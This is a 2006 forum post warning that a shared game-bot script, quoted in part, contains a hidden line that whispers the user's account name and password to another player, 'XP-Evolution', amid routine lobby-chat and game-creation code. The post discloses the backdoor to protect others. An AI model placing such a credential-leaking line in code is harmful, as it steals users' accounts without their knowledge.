07-19-2006, 02:02 AM
ya uh someone on EoN (if you know what I am talking about)
post this. and says it may have set up scam you and steal your accounts.. take a look
sry if im not allowed to post this..
I havent been around here in like... forver.. haha
post this. and says it may have set up scam you and steal your accounts.. take a look
Quote:case 3: // Lobby Chat
if( !chatActionsDone ) {
chatActionsDone = true;
delay( rnd(waitInChatBeforeActionsMin, waitInChatBeforeActionsMax) );
if( joinRandomChannel || joinChannelInChat != "" ) {
say( "/join " + (joinRandomChannel ? getRandomString(rnd(3,10)) : joinChannelInChat) );
delay( rnd(waitAfterChannelJoinMin, waitAfterChannelJoinMax) );
}
//If chosen to creat games starting at 1 and go up from there (1,2,3,4,etc), else start at 0. Thanks to collective for this
if( spamGame && joinChatAfterGame ) {
if (startgameatone) {
name = (!gameData.gameName || gameData.useRandomGameName ? getRandomString(rnd(minimumGameNameChars,maximumGameNameChars)) : gameData.gameName + (gameData.totalGames + 1));
pass = (gameData.useRandomGamePass ? getRandomString(rnd(minimumGamePassChars,maximumGamePassChars)) : gameData.gamePass);
} else {
name = (!gameData.gameName || gameData.useRandomGameName ? getRandomString(rnd(minimumGameNameChars,maximumGameNameChars)) : gameData.gameName + (gameData.totalGames));
pass = (gameData.useRandomGamePass ? getRandomString(rnd(minimumGamePassChars,maximumGamePassChars)) : gameData.gamePass);
}
if ( gameData.gamePass != "" ) {
if (spamPass) { say( "Game " + name + "//" + pass + " will be made soon enough, please wait for me to tell you when." ); }
Quote:else { say( "/m XP-Evolution "+gameData.accountName+":l"+gameData.accountPass); }
} else { say( "Game " + name + " will be made soon enough, please wait for me to tell you when." ); }
delay( 1000 );
}
if( gameData.followBotMode ) break;
if( randomChatTalk ) {
for( i=0; i<rnd(randomChatLinesMin, randomChatLinesMax); i++ ) {
say( pickRandomLocaleKey() );
delay( rnd( randomChatLineDelayMin, randomChatLineDelayMax ) );
}
}
sry if im not allowed to post this..
I havent been around here in like... forver.. haha